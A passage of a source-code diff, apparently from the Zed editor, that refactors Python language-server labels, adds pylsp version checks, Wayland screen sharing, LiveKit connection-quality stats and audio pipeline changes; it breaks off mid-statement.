PythonEnvironmentKind::WindowsRegistry => "global (Windows Registry)",
PythonEnvironmentKind::Uv => "uv",
@@ -1738,33 +1769,7 @@ impl LspAdapter for PyLspAdapter {
symbol: &language::Symbol,
language: &Arc<language::Language>,
) -> Option<language::CodeLabel> {
- let name = &symbol.name;
- let (text, filter_range, display_range) = match symbol.kind {
- lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => {
- let text = format!("def {}():\n", name);
- let filter_range = 4..4 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CLASS => {
- let text = format!("class {}:", name);
- let filter_range = 6..6 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CONSTANT => {
- let text = format!("{} = 0", name);
- let filter_range = 0..name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- _ => return None,
- };
- Some(language::CodeLabel::new(
- text[display_range.clone()].to_string(),
- filter_range,
- language.highlight_text(&text.as_str().into(), display_range),
- ))
+ label_for_python_symbol(symbol, language)
}
async fn workspace_configuration(
@@ -1846,6 +1851,17 @@ impl LspInstaller for PyLspAdapter {
) -> Option<LanguageServerBinary> {
if let Some(pylsp_bin) = delegate.which(Self::SERVER_NAME.as_ref()).await {
let env = delegate.shell_env().await;
+ delegate
+ .try_exec(LanguageServerBinary {
+ path: pylsp_bin.clone(),
+ arguments: vec!["--version".into()],
+ env: Some(env.clone()),
+ })
+ .await
+ .inspect_err(|err| {
+ log::warn!("failed to validate user-installed pylsp at {pylsp_bin:?}: {err:#}")
+ })
+ .ok()?;
Some(LanguageServerBinary {
path: pylsp_bin,
env: Some(env),
@@ -1854,7 +1870,21 @@ impl LspInstaller for PyLspAdapter {
} else {
let toolchain = toolchain?;
let pylsp_path = Path::new(toolchain.path.as_ref()).parent()?.join("pylsp");
- pylsp_path.exists().then(|| LanguageServerBinary {
+ if !pylsp_path.exists() {
+ return None;
+ }
+ delegate
+ .try_exec(LanguageServerBinary {
+ path: toolchain.path.to_string().into(),
+ arguments: vec![pylsp_path.clone().into(), "--version".into()],
+ env: None,
+ })
+ .await
+ .inspect_err(|err| {
+ log::warn!("failed to validate toolchain pylsp at {pylsp_path:?}: {err:#}")
+ })
+ .ok()?;
+ Some(LanguageServerBinary {
path: toolchain.path.to_string().into(),
arguments: vec![pylsp_path.into()],
env: None,
@@ -1994,36 +2024,7 @@ impl LspAdapter for BasedPyrightLspAdapter {
item: &lsp::CompletionItem,
language: &Arc<language::Language>,
) -> Option<language::CodeLabel> {
- let label = &item.label;
- let label_len = label.len();
- let grammar = language.grammar()?;
- let highlight_id = match item.kind? {
- lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"),
- lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"),
- lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"),
- lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"),
- lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"),
- _ => {
- return None;
- }
- };
- let mut text = label.clone();
- if let Some(completion_details) = item
- .label_details
- .as_ref()
- .and_then(|details| details.description.as_ref())
- {
- write!(&mut text, " {}", completion_details).ok();
- }
- Some(language::CodeLabel::filtered(
- text,
- label_len,
- item.filter_text.as_deref(),
- highlight_id
- .map(|id| (0..label.len(), id))
- .into_iter()
- .collect(),
- ))
+ label_for_pyright_completion(item, language)
}
async fn label_for_symbol(
@@ -2031,33 +2032,7 @@ impl LspAdapter for BasedPyrightLspAdapter {
symbol: &Symbol,
language: &Arc<language::Language>,
) -> Option<language::CodeLabel> {
- let name = &symbol.name;
- let (text, filter_range, display_range) = match symbol.kind {
- lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => {
- let text = format!("def {}():\n", name);
- let filter_range = 4..4 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CLASS => {
- let text = format!("class {}:", name);
- let filter_range = 6..6 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CONSTANT => {
- let text = format!("{} = 0", name);
- let filter_range = 0..name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- _ => return None,
- };
- Some(language::CodeLabel::new(
- text[display_range.clone()].to_string(),
- filter_range,
- language.highlight_text(&text.as_str().into(), display_range),
- ))
+ label_for_python_symbol(symbol, language)
}
async fn workspace_configuration(
@@ -0,0 +1,15 @@
+[
+ {
+ "token_type": "selfParameter",
+ "style": ["variable.special"]
+ },
+ {
+ "token_type": "clsParameter",
+ "style": ["variable.special"]
+ },
+ // ty specific
+ {
+ "token_type": "builtinConstant",
+ "style": ["constant.builtin"]
+ }
+]
@@ -7,14 +7,17 @@
("{" @open
"}" @close)
-("<" @open
+(("<" @open
">" @close)
+ (#set! rainbow.exclude))
-("<" @open
+(("<" @open
"/>" @close)
+ (#set! rainbow.exclude))
-("</" @open
+(("</" @open
">" @close)
+ (#set! rainbow.exclude))
(("\"" @open
"\"" @close)
@@ -268,7 +268,6 @@
"abstract"
"as"
"async"
- "await"
"debugger"
"declare"
"default"
@@ -318,6 +317,7 @@
] @keyword.import
[
+ "await"
"break"
"case"
"catch"
@@ -387,7 +387,6 @@
"abstract"
"as"
"async"
- "await"
"debugger"
"declare"
"default"
@@ -437,6 +436,7 @@
] @keyword.import
[
+ "await"
"break"
"case"
"catch"
@@ -47,6 +47,10 @@ util.workspace = true
libwebrtc.workspace = true
livekit.workspace = true
+[target.'cfg(target_os = "linux")'.dependencies]
+tokio = { workspace = true, features = ["time"] }
+webrtc-sys.workspace = true
+
[target.'cfg(any(target_os = "linux", target_os = "freebsd", target_os = "windows"))'.dependencies]
scap.workspace = true
@@ -35,15 +35,7 @@ fn main() {
cx.activate(true);
cx.on_action(quit);
cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]);
- cx.set_menus(vec![Menu {
- name: "Zed".into(),
- items: vec![MenuItem::Action {
- name: "Quit".into(),
- action: Box::new(Quit),
- os_action: None,
- checked: false,
- }],
- }]);
+ cx.set_menus([Menu::new("Zed").items([MenuItem::action("Quit", Quit)])]);
let livekit_url = std::env::var("LIVEKIT_URL").unwrap_or("http://localhost:7880".into());
let livekit_key = std::env::var("LIVEKIT_KEY").unwrap_or("devkey".into());
@@ -255,7 +247,7 @@ impl LivekitWindow {
} else {
let room = self.room.clone();
cx.spawn_in(window, async move |this, cx| {
- let (publication, stream) = room
+ let (publication, stream, _input_lag_us) = room
.publish_local_microphone_track("test_user".to_string(), false, cx)
.await
.unwrap();
@@ -67,6 +67,14 @@ pub enum Participant {
Remote(RemoteParticipant),
}
+#[derive(Copy, Clone, Debug, Eq, PartialEq, PartialOrd, Ord)]
+pub enum ConnectionQuality {
+ Excellent,
+ Good,
+ Poor,
+ Lost,
+}
+
#[derive(Debug, Clone)]
pub enum TrackPublication {
Local(LocalTrackPublication),
@@ -179,6 +187,10 @@ pub enum RoomEvent {
ActiveSpeakersChanged {
speakers: Vec<Participant>,
},
+ ConnectionQualityChanged {
+ participant: Participant,
+ quality: ConnectionQuality,
+ },
ConnectionStateChanged(ConnectionState),
Connected {
participants_with_tracks: Vec<(RemoteParticipant, Vec<RemoteTrackPublication>)>,
@@ -1,19 +1,21 @@
-use anyhow::{Context as _, Result, anyhow};
+use anyhow::{Context as _, Result};
use audio::AudioSettings;
use collections::HashMap;
use futures::{SinkExt, channel::mpsc};
use gpui::{App, AsyncApp, ScreenCaptureSource, ScreenCaptureStream, Task};
use gpui_tokio::Tokio;
-use log::info;
+
use playback::capture_local_video_track;
use settings::Settings;
+use std::sync::{Arc, atomic::AtomicU64};
+#[cfg(target_os = "linux")]
+mod linux;
mod playback;
-use crate::{
- LocalTrack, Participant, RemoteTrack, RoomEvent, TrackPublication,
- livekit_client::playback::Speaker,
-};
+use crate::{ConnectionQuality, LocalTrack, Participant, RemoteTrack, RoomEvent, TrackPublication};
+pub use livekit::SessionStats;
+pub use livekit::webrtc::stats::RtcStats;
pub use playback::AudioStream;
pub(crate) use playback::{RemoteVideoFrame, play_remote_video_track};
@@ -107,8 +109,8 @@ impl Room {
user_name: String,
is_staff: bool,
cx: &mut AsyncApp,
- ) -> Result<(LocalTrackPublication, playback::AudioStream)> {
- let (track, stream) = self
+ ) -> Result<(LocalTrackPublication, playback::AudioStream, Arc<AtomicU64>)> {
+ let (track, stream, input_lag_us) = self
.playback
.capture_local_microphone_track(user_name, is_staff, &cx)?;
let publication = self
@@ -123,7 +125,7 @@ impl Room {
)
.await?;
- Ok((publication, stream))
+ Ok((publication, stream, input_lag_us))
}
pub async fn unpublish_local_track(
@@ -139,28 +141,37 @@ impl Room {
track: &RemoteAudioTrack,
cx: &mut App,
) -> Result<playback::AudioStream> {
- let speaker: Speaker =
- serde_urlencoded::from_str(&track.0.name()).unwrap_or_else(|_| Speaker {
- name: track.0.name(),
- is_staff: false,
- sends_legacy_audio: true,
- });
-
- if AudioSettings::get_global(cx).rodio_audio {
- info!("Using experimental.rodio_audio audio pipeline for output");
- playback::play_remote_audio_track(&track.0, speaker, cx)
- } else if speaker.sends_legacy_audio {
- let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone();
- Ok(self
- .playback
- .play_remote_audio_track(&track.0, output_audio_device))
- } else {
- Err(anyhow!("Client version too old to play audio in call"))
- }
+ let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone();
+ Ok(self
+ .playback
+ .play_remote_audio_track(&track.0, output_audio_device))
+ }
+
+ pub async fn get_stats(&self) -> Result<livekit::SessionStats> {
+ self.room.get_stats().await.map_err(anyhow::Error::from)
+ }
+
+ /// Returns a `Task` that fetches room stats on the Tokio runtime.
+ ///
+ /// LiveKit's SDK is Tokio-based, so the stats fetch must run within
+ /// a Tokio context rather than on GPUI's smol-based background executor.
+ pub fn stats_task(&self, cx: &impl gpui::AppContext) -> Task<Result<livekit::SessionStats>> {
+ let inner = self.room.clone();
+ Tokio::spawn_result(cx, async move {
+ inner.get_stats().await.map_err(anyhow::Error::from)
+ })
}
}
impl LocalParticipant {
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ connection_quality_from_livekit(self.0.connection_quality())
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ self.0.audio_level()
+ }
+
pub async fn publish_screenshare_track(
&self,
source: &dyn ScreenCaptureSource,
@@ -205,6 +216,33 @@ impl LocalParticipant {
.map(LocalTrackPublication)
.context("unpublishing a track")
}
+
+ #[cfg(target_os = "linux")]
+ pub async fn publish_screenshare_track_wayland(
+ &self,
+ cx: &mut AsyncApp,
+ ) -> Result<(
+ LocalTrackPublication,
+ Box<dyn ScreenCaptureStream>,
+ futures::channel::oneshot::Receiver<()>,
+ )> {
+ let (track, stop_flag, feed_task, failure_rx) =
+ linux::start_wayland_desktop_capture(cx).await?;
+ let options = livekit::options::TrackPublishOptions {
+ source: livekit::track::TrackSource::Screenshare,
+ video_codec: livekit::options::VideoCodec::VP8,
+ ..Default::default()
+ };
+ let publication = self
+ .publish_track(livekit::track::LocalTrack::Video(track.0), options, cx)
+ .await?;
+
+ Ok((
+ publication,
+ Box::new(linux::WaylandScreenCaptureStream::new(stop_flag, feed_task)),
+ failure_rx,
+ ))
+ }
}
impl LocalTrackPublication {
@@ -234,6 +272,14 @@ impl LocalTrackPublication {
}
impl RemoteParticipant {
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ connection_quality_from_livekit(self.0.connection_quality())
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ self.0.audio_level()
+ }
+
pub fn identity(&self) -> ParticipantIdentity {
ParticipantIdentity(self.0.identity().0)
}
@@ -297,6 +343,31 @@ impl Participant {
}
}
}
+
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ match self {
+ Participant::Local(local_participant) => local_participant.connection_quality(),
+ Participant::Remote(remote_participant) => remote_participant.connection_quality(),
+ }
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ match self {
+ Participant::Local(local_participant) => local_participant.audio_level(),
+ Participant::Remote(remote_participant) => remote_participant.audio_level(),
+ }
+ }
+}
+
+fn connection_quality_from_livekit(
+ quality: livekit::prelude::ConnectionQuality,
+) -> ConnectionQuality {
+ match quality {
+ livekit::prelude::ConnectionQuality::Excellent => ConnectionQuality::Excellent,
+ livekit::prelude::ConnectionQuality::Good => ConnectionQuality::Good,
+ livekit::prelude::ConnectionQuality::Poor => ConnectionQuality::Poor,
+ livekit::prelude::ConnectionQuality::Lost => ConnectionQuality::Lost,
+ }
}
fn participant_from_livekit(participant: livekit::participant::Participant) -> Participant {
@@ -474,6 +545,13 @@ fn room_event_from_livekit(event: livekit::RoomEvent) -> Option<RoomEvent> {
},
livekit::RoomEvent::Reconnecting => RoomEvent::Reconnecting,
livekit::RoomEvent::Reconnected => RoomEvent::Reconnected,
+ livekit::RoomEvent::ConnectionQualityChanged {
+ quality,
+ participant,
+ } => RoomEvent::ConnectionQualityChanged {
+ participant: participant_from_livekit(participant),
+ quality: connection_quality_from_livekit(quality),
+ },
_ => {
log::trace!("dropping livekit event: {:?}", event);
return None;
@@ -0,0 +1,203 @@
+use anyhow::Result;
+use futures::StreamExt as _;
+use futures::channel::oneshot;
+use gpui::{AsyncApp, ScreenCaptureStream};
+use livekit::track;
+use livekit::webrtc::{
+ prelude::NV12Buffer,
+ video_frame::{VideoFrame, VideoRotation},
+ video_source::{RtcVideoSource, VideoResolution, native::NativeVideoSource},
+};
+use std::sync::{
+ Arc,
+ atomic::{AtomicBool, AtomicU64, Ordering},
+};
+
+static NEXT_WAYLAND_SHARE_ID: AtomicU64 = AtomicU64::new(1);
+const PIPEWIRE_TIMEOUT_S: u64 = 30;
+
+pub struct WaylandScreenCaptureStream {
+ id: u64,
+ stop_flag: Arc<AtomicBool>,
+ _capture_task: gpui::Task<()>,
+}
+
+impl WaylandScreenCaptureStream {
+ pub fn new(stop_flag: Arc<AtomicBool>, capture_task: gpui::Task<()>) -> Self {
+ Self {
+ id: NEXT_WAYLAND_SHARE_ID.fetch_add(1, Ordering::Relaxed),
+ stop_flag,
+ _capture_task: capture_task,
+ }
+ }
+}
+
+impl ScreenCaptureStream for WaylandScreenCaptureStream {
+ fn metadata(&self) -> Result<gpui::SourceMetadata> {
+ Ok(gpui::SourceMetadata {
+ id: self.id,
+ label: None,
+ is_main: None,
+ resolution: gpui::size(gpui::DevicePixels(1), gpui::DevicePixels(1)),
+ })
+ }
+}
+
+impl Drop for WaylandScreenCaptureStream {
+ fn drop(&mut self) {
+ self.stop_flag.store(true, Ordering::Release);
+ }
+}
+
+pub(crate) async fn start_wayland_desktop_capture(
+ cx: &mut AsyncApp,
+) -> Result<(
+ crate::LocalVideoTrack,
+ Arc<AtomicBool>,
+ gpui::Task<()>,
+ oneshot::Receiver<()>,
+)> {
+ use futures::channel::mpsc;
+ use gpui::FutureExt as _;
+ use libwebrtc::desktop_capturer::{
+ CaptureError, DesktopCaptureSourceType, DesktopCapturer, DesktopCapturerOptions,
+ DesktopFrame,
+ };
+ use libwebrtc::native::yuv_helper::argb_to_nv12;
+ use std::time::Duration;
+ use webrtc_sys::webrtc::ffi as webrtc_ffi;
+
+ fn webrtc_log_callback(message: String, severity: webrtc_ffi::LoggingSeverity) {
+ match severity {
+ webrtc_ffi::LoggingSeverity::Error => log::error!("[webrtc] {}", message.trim()),
+ _ => log::debug!("[webrtc] {}", message.trim()),
+ }
+ }
+
+ let _webrtc_log_sink = webrtc_ffi::new_log_sink(webrtc_log_callback);
+ log::debug!("Wayland desktop capture: WebRTC internal logging enabled");
+
+ let stop_flag = Arc::new(AtomicBool::new(false));
+ let (mut video_source_tx, mut video_source_rx) = mpsc::channel::<NativeVideoSource>(1);
+ let (failure_tx, failure_rx) = oneshot::channel::<()>();
+
+ let mut options = DesktopCapturerOptions::new(DesktopCaptureSourceType::Generic);
+ options.set_include_cursor(true);
+ let mut capturer = DesktopCapturer::new(options).ok_or_else(|| {
+ anyhow::anyhow!(
+ "Failed to create desktop capturer. \
+ Check that xdg-desktop-portal is installed and running."
+ )
+ })?;
+
+ let permanent_error = Arc::new(AtomicBool::new(false));
+ let stop_cb = stop_flag.clone();
+ let permanent_error_cb = permanent_error.clone();
+ capturer.start_capture(None, {
+ let mut video_source: Option<NativeVideoSource> = None;
+ let mut current_width: u32 = 0;
+ let mut current_height: u32 = 0;
+ let mut video_frame = VideoFrame {
+ rotation: VideoRotation::VideoRotation0,
+ buffer: NV12Buffer::new(1, 1),
+ timestamp_us: 0,
+ };
+
+ move |result: Result<DesktopFrame, CaptureError>| {
+ let frame = match result {
+ Ok(frame) => frame,
+ Err(CaptureError::Temporary) => return,
+ Err(CaptureError::Permanent) => {
+ log::error!("Wayland desktop capture encountered a permanent error");
+ permanent_error_cb.store(true, Ordering::Release);
+ stop_cb.store(true, Ordering::Release);
+ return;
+ }
+ };
+
+ let width = frame.width() as u32;
+ let height = frame.height() as u32;
+ if width != current_width || height != current_height {
+ current_width = width;
+ current_height = height;
+ video_frame.buffer = NV12Buffer::new(width, height);
+ }
+
+ let (stride_y, stride_uv) = video_frame.buffer.strides();
+ let (data_y, data_uv) = video_frame.buffer.data_mut();
+ argb_to_nv12(
+ frame.data(),
+ frame.stride(),
+ data_y,
+ stride_y,
+ data_uv,
+ stride_uv,
+ width as i32,
+ height as i32,
+ );
+
+ if let Some(source) = &video_source {
+ source.capture_frame(&video_frame);
+ } else {
+ let source = NativeVideoSource::new(VideoResolution { width, height }, true);
+ source.capture_frame(&video_frame);
+ video_source_tx.try_send(source.clone()).ok();
+ video_source = Some(source);
+ }
+ }
+ });
+
+ log::info!("Wayland desktop capture: starting capture loop");
+
+ let stop = stop_flag.clone();
+ let tokio_task = gpui_tokio::Tokio::spawn(cx, async move {
+ loop {
+ if stop.load(Ordering::Acquire) {
+ break;
+ }
+ capturer.capture_frame();
+ tokio::time::sleep(Duration::from_millis(33)).await;
+ }
+ drop(capturer);
+
+ if permanent_error.load(Ordering::Acquire) {
+ log::error!("Wayland screen capture ended due to a permanent capture error");
+ let _ = failure_tx.send(());
+ }
+ });
+
+ let capture_task = cx.background_executor().spawn(async move {
+ if let Err(error) = tokio_task.await {
+ log::error!("Wayland capture task failed: {error}");
+ }
+ });
+
+ let executor = cx.background_executor().clone();
+ let video_source = video_source_rx
+ .next()
+ .with_timeout(Duration::from_secs(PIPEWIRE_TIMEOUT_S), &executor)
+ .await
+ .map_err(|_| {
+ stop_flag.store(true, Ordering::Relaxed);
+ log::error!("Wayland desktop capture timed out.");
+ anyhow::anyhow!(
+ "Screen sharing timed out waiting for the first frame. \
+ Check that xdg-desktop-portal and PipeWire are running, \
+ and that your portal backend matches your compositor."
+ )
+ })?
+ .ok_or_else(|| {
+ stop_flag.store(true, Ordering::Relaxed);
+ anyhow::anyhow!(
+ "Screen sharing was canceled or the portal denied permission. \
+ You can try again from the screen share button."
+ )
+ })?;
+
+ let track = super::LocalVideoTrack(track::LocalVideoTrack::create_video_track(
+ "screen share",
+ RtcVideoSource::Native(video_source),
+ ));
+
+ Ok((track, stop_flag, capture_task, failure_rx))
+}
@@ -1,9 +1,9 @@
use anyhow::{Context as _, Result};
-use audio::{AudioSettings, CHANNEL_COUNT, LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE, SAMPLE_RATE};
+use audio::{AudioSettings, CHANNEL_COUNT, SAMPLE_RATE};
use cpal::DeviceId;
use cpal::traits::{DeviceTrait, StreamTrait as _};
-use futures::channel::mpsc::UnboundedSender;
+use futures::channel::mpsc::Sender;
use futures::{Stream, StreamExt as _};
use gpui::{
AsyncApp, BackgroundExecutor, Priority, ScreenCaptureFrame, ScreenCaptureSource,
@@ -23,16 +23,21 @@ use livekit::webrtc::{
use log::info;
use parking_lot::Mutex;
use rodio::Source;
+use rodio::conversions::SampleTypeConverter;
+use rodio::source::{AutomaticGainControlSettings, LimitSettings};
use serde::{Deserialize, Serialize};
use settings::Settings;
use std::cell::RefCell;
use std::sync::Weak;
-use std::sync::atomic::{AtomicBool, AtomicI32, Ordering};
-use std::time::Duration;
-use std::{borrow::Cow, collections::VecDeque, sync::Arc, thread};
+use std::sync::atomic::{AtomicI32, AtomicU64, Ordering};
+use std::time::{Duration, Instant};
+use std::{borrow::Cow, collections::VecDeque, sync::Arc};
use util::{ResultExt as _, maybe};
-mod source;
+struct TimestampedFrame {
+ frame: AudioFrame<'static>,
+ captured_at: Instant,
+}
pub(crate) struct AudioStack {
executor: BackgroundExecutor,
@@ -42,38 +47,6 @@ pub(crate) struct AudioStack {
next_ssrc: AtomicI32,
}
-pub(crate) fn play_remote_audio_track(
- track: &livekit::track::RemoteAudioTrack,
- speaker: Speaker,
- cx: &mut gpui::App,
-) -> Result<AudioStream> {
- info!("speaker: {speaker:?}");
- let stream =
- source::LiveKitStream::new(cx.background_executor(), track, speaker.sends_legacy_audio);
-
- let stop_handle = Arc::new(AtomicBool::new(false));
- let stop_handle_clone = stop_handle.clone();
- let stream = stream
- .stoppable()
- .periodic_access(Duration::from_millis(50), move |s| {
- if stop_handle.load(Ordering::Relaxed) {
- s.stop();
- }
- });
-
- info!("sample_rate: {:?}", stream.sample_rate());
- info!("channel_count: {:?}", stream.channels());
- audio::Audio::play_voip_stream(stream, speaker.name, speaker.is_staff, cx)
- .context("Could not play audio")?;
-
- let on_drop = util::defer(move || {
- stop_handle_clone.store(true, Ordering::Relaxed);
- });
- Ok(AudioStream::Output {
- _drop: Box::new(on_drop),
- })
-}
-
impl AudioStack {
pub(crate) fn new(executor: BackgroundExecutor) -> Self {
let apm = Arc::new(Mutex::new(apm::AudioProcessingModule::new(
@@ -99,8 +72,8 @@ impl AudioStack {
let next_ssrc = self.next_ssrc.fetch_add(1, Ordering::Relaxed);
let source = AudioMixerSource {
ssrc: next_ssrc,
- sample_rate: LEGACY_SAMPLE_RATE.get(),
- num_channels: LEGACY_CHANNEL_COUNT.get() as u32,
+ sample_rate: SAMPLE_RATE.get(),
+ num_channels: CHANNEL_COUNT.get() as u32,
buffer: Arc::default(),
};
self.mixer.lock().add_source(source.clone());
@@ -111,7 +84,7 @@ impl AudioStack {
source.num_channels as i32,
);
- let receive_task = self.executor.spawn({
+ let receive_task = self.executor.spawn_with_priority(Priority::RealtimeAudio, {
let source = source.clone();
async move {
while let Some(frame) = stream.next().await {
@@ -139,12 +112,14 @@ impl AudioStack {
let task = Arc::new(self.executor.spawn({
let apm = self.apm.clone();
let mixer = self.mixer.clone();
+ let executor = self.executor.clone();
async move {
Self::play_output(
+ executor,
apm,
mixer,
- LEGACY_SAMPLE_RATE.get(),
- LEGACY_CHANNEL_COUNT.get().into(),
+ SAMPLE_RATE.get(),
+ CHANNEL_COUNT.get().into(),
output_audio_device,
)
.await
@@ -160,33 +135,18 @@ impl AudioStack {
user_name: String,
is_staff: bool,
cx: &AsyncApp,
- ) -> Result<(crate::LocalAudioTrack, AudioStream)> {
- let legacy_audio_compatible =
- AudioSettings::try_read_global(cx, |setting| setting.legacy_audio_compatible)
- .unwrap_or(true);
-
- let source = if legacy_audio_compatible {
- NativeAudioSource::new(
- // n.b. this struct's options are always ignored, noise cancellation is provided by apm.
- AudioSourceOptions::default(),
- LEGACY_SAMPLE_RATE.get(),
- LEGACY_CHANNEL_COUNT.get().into(),
- 10,
- )
- } else {
- NativeAudioSource::new(
- // n.b. this struct's options are always ignored, noise cancellation is provided by apm.
- AudioSourceOptions::default(),
- SAMPLE_RATE.get(),
- CHANNEL_COUNT.get().into(),
- 10,
- )
- };
+ ) -> Result<(crate::LocalAudioTrack, AudioStream, Arc<AtomicU64>)> {
+ let source = NativeAudioSource::new(
+ // n.b. this struct's options are always ignored, noise cancellation is provided by apm.
+ AudioSourceOptions::default(),
+ SAMPLE_RATE.get(),
+ CHANNEL_COUNT.get().into(),
+ 10,
+ );
let speaker = Speaker {
name: user_name,
is_staff,
- sends_legacy_audio: legacy_audio_compatible,
};
log::info!("Microphone speaker: {speaker:?}");
let track_name = serde_urlencoded::to_string(speaker)
@@ -199,38 +159,30 @@ impl AudioStack {
let apm = self.apm.clone();
- let (frame_tx, mut frame_rx) = futures::channel::mpsc::unbounded();
- let transmit_task = self.executor.spawn({
+ let input_lag_us = Arc::new(AtomicU64::new(0));
+ let (frame_tx, mut frame_rx) = futures::channel::mpsc::channel::<TimestampedFrame>(1);
+ let transmit_task = self.executor.spawn_with_priority(Priority::RealtimeAudio, {
+ let input_lag_us = input_lag_us.clone();
async move {
- while let Some(frame) = frame_rx.next().await {
- source.capture_frame(&frame).await.log_err();
+ while let Some(timestamped) = frame_rx.next().await {
+ let lag = timestamped.captured_at.elapsed();
+ input_lag_us.store(lag.as_micros() as u64, Ordering::Relaxed);
+ source.capture_frame(×tamped.frame).await.log_err();
}
}
});
- let rodio_pipeline =
- AudioSettings::try_read_global(cx, |setting| setting.rodio_audio).unwrap_or_default();
- let capture_task = if rodio_pipeline {
- info!("Using experimental.rodio_audio audio pipeline");
- let voip_parts = audio::VoipParts::new(cx)?;
- // Audio needs to run real-time and should never be paused. That is
- // why we are using a normal std::thread and not a background task
- self.executor
- .spawn_with_priority(Priority::RealtimeAudio, async move {
- // microphone is non send on mac
- let microphone = audio::Audio::open_microphone(voip_parts)?;
- send_to_livekit(frame_tx, microphone);
- Ok(())
- })
- } else {
+ let capture_task = {
let input_audio_device =
AudioSettings::try_read_global(cx, |settings| settings.input_audio_device.clone())
.flatten();
+ let executor = self.executor.clone();
self.executor.spawn(async move {
Self::capture_input(
+ executor,
apm,
frame_tx,
- LEGACY_SAMPLE_RATE.get(),
- LEGACY_CHANNEL_COUNT.get().into(),
+ SAMPLE_RATE.get(), // TODO(audio): was legacy removed for now
+ CHANNEL_COUNT.get().into(),
input_audio_device,
)
.await
@@ -246,14 +198,16 @@ impl AudioStack {
AudioStream::Output {
_drop: Box::new(on_drop),
},
+ input_lag_us,
))
}
async fn play_output(
+ executor: BackgroundExecutor,
apm: Arc<Mutex<apm::AudioProcessingModule>>,
mixer: Arc<Mutex<audio_mixer::AudioMixer>>,
sample_rate: u32,
- num_channels: u32,
+ _num_channels: u32,
output_audio_device: Option<DeviceId>,
) -> Result<()> {
// Prevent App Nap from throttling audio playback on macOS.
@@ -265,15 +219,15 @@ impl AudioStack {
let mut device_change_listener = DeviceChangeListener::new(false)?;
let (output_device, output_config) =
crate::default_device(false, output_audio_device.as_ref())?;
+ info!("Output config: {output_config:?}");
let (end_on_drop_tx, end_on_drop_rx) = std::sync::mpsc::channel::<()>();
let mixer = mixer.clone();
let apm = apm.clone();
let mut resampler = audio_resampler::AudioResampler::default();
let mut buf = Vec::new();
- thread::Builder::new()
- .name("AudioPlayback".to_owned())
- .spawn(move || {
+ executor
+ .spawn_with_priority(Priority::RealtimeAudio, async move {
let output_stream = output_device.build_output_stream(
&output_config.config(),
{
@@ -296,7 +250,12 @@ impl AudioStack {
let sampled = resampler.remix_and_resample(
mixed,
sample_rate / 100,
- num_channels,
+ // We need to assume output number of channels as otherwise we will
+ // crash in process_reverse_stream otherwise as livekit's audio resampler
+ // does not seem to support non-matching channel counts.
+ // NOTE: you can verify this by debug printing buf.len() after this stage.
+ // For 2->4 channel upmix, we should see buf.len=1920, buf we get only 960.
+ output_config.channels() as u32,
sample_rate,
output_config.channels() as u32,
output_config.sample_rate(),
@@ -324,7 +283,7 @@ impl AudioStack {
// Block forever to keep the output stream alive
end_on_drop_rx.recv().ok();
})
- .unwrap();
+ .detach();
device_change_listener.next().await;
drop(end_on_drop_tx)
@@ -332,8 +291,9 @@ impl AudioStack {
}
async fn capture_input(
+ executor: BackgroundExecutor,
apm: Arc<Mutex<apm::AudioProcessingModule>>,
- frame_tx: UnboundedSender<AudioFrame<'static>>,
+ frame_tx: Sender<TimestampedFrame>,
sample_rate: u32,
num_channels: u32,
input_audio_device: Option<DeviceId>,
@@ -343,12 +303,11 @@ impl AudioStack {
let (device, config) = crate::default_device(true, input_audio_device.as_ref())?;
let (end_on_drop_tx, end_on_drop_rx) = std::sync::mpsc::channel::<()>();
let apm = apm.clone();
- let frame_tx = frame_tx.clone();
+ let mut frame_tx = frame_tx.clone();
let mut resampler = audio_resampler::AudioResampler::default();
- thread::Builder::new()
- .name("AudioCapture".to_owned())
- .spawn(move || {
+ executor
+ .spawn_with_priority(Priority::RealtimeAudio, async move {
maybe!({
if let Some(desc) = device.description().ok() {
log::info!("Using microphone: {}", desc.name())
@@ -359,12 +318,21 @@ impl AudioStack {
let ten_ms_buffer_size =
(config.channels() as u32 * config.sample_rate() / 100) as usize;
let mut buf: Vec<i16> = Vec::with_capacity(ten_ms_buffer_size);
+ let mut rodio_effects = RodioEffectsAdaptor::new(buf.len())
+ .automatic_gain_control(AutomaticGainControlSettings {
+ target_level: 0.50,
+ attack_time: Duration::from_secs(1),
+ release_time: Duration::from_secs(0),
+ absolute_max_gain: 5.0,
+ })
+ .limit(LimitSettings::live_performance());
let stream = device
.build_input_stream_raw(
&config.config(),
config.sample_format(),
move |data, _: &_| {
+ let captured_at = Instant::now();
let data = crate::get_sample_data(config.sample_format(), data)
.log_err();
let Some(data) = data else {
@@ -389,6 +357,21 @@ impl AudioStack {
sample_rate,
)
.to_owned();
+
+ if audio::LIVE_SETTINGS
+ .auto_microphone_volume
+ .load(Ordering::Relaxed)
+ {
+ rodio_effects
+ .inner_mut()
+ .inner_mut()
+ .fill_buffer_with(&sampled);
+ sampled.clear();
+ sampled.extend(SampleTypeConverter::<_, i16>::new(
+ rodio_effects.by_ref(),
+ ));
+ }
+
apm.lock()
.process_stream(
&mut sampled,
@@ -397,12 +380,16 @@ impl AudioStack {
)
.log_err();
buf.clear();
+
frame_tx
